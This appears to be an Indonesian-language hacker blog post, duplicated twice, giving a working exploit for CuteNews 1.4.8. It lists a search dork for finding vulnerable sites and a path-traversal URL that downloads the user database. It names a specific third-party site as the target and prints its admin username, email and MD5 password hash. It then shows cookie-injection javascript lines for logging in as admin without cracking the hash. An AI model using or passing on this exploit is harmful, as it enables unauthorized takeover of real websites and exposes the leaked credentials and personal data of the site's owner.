Judul Eksploit : CuteNews Exploit
Tanggal : 11 mei 2011
Author : Zidny
Software Link : http://www.cutephp.com/
Version : 1.4.8
Kategori : Php
Tested on : Linux, Windows
--------------------------------------------------
Google Dork : inurl:"news/file.php?file="
--------------------------------------------------
Exploit & POC :
target = http://counter.internationalmigrants.org/
Download user = http://counter.internationalmigrants.org/news/file.php?file=..%2Fusers.db.php
found data: 1219972316|1|admin|3602411b3179a890e22506ae4aef486b|admin|web@internationalmigrants.org|25|0||1223373374||
admin|3602411b3179a890e22506ae4aef486b << user | pass
login page = http://counter.internationalmigrants.org/news/
how to login = tidak usah crack md5nya... cukup injek biskuit... :v
javascript:void(document.cookie="username=admin"); javascript:void(document.cookie="md5_password=3602411b3179a890e22506ae4aef486b");
refresh http://counter.internationalmigrants.org/news/
taraa.......
selamat berkreasi ^_^
http://kedirihackerlink.org/
--------------------------------------------------
Tanggal : 11 mei 2011
Author : Zidny
Software Link : http://www.cutephp.com/
Version : 1.4.8
Kategori : Php
Tested on : Linux, Windows
--------------------------------------------------
Google Dork : inurl:"news/file.php?file="
--------------------------------------------------
Exploit & POC :
target = http://counter.internationalmigrants.org/
Download user = http://counter.internationalmigrants.org/news/file.php?file=..%2Fusers.db.php
found data: 1219972316|1|admin|3602411b3179a890e22506ae4aef486b|admin|web@internationalmigrants.org|25|0||1223373374||
admin|3602411b3179a890e22506ae4aef486b << user | pass
login page = http://counter.internationalmigrants.org/news/
how to login = tidak usah crack md5nya... cukup injek biskuit... :v
javascript:void(document.cookie="username=admin"); javascript:void(document.cookie="md5_password=3602411b3179a890e22506ae4aef486b");
refresh http://counter.internationalmigrants.org/news/
taraa.......
selamat berkreasi ^_^
http://kedirihackerlink.org/
--------------------------------------------------
0 komentar:
Posting Komentar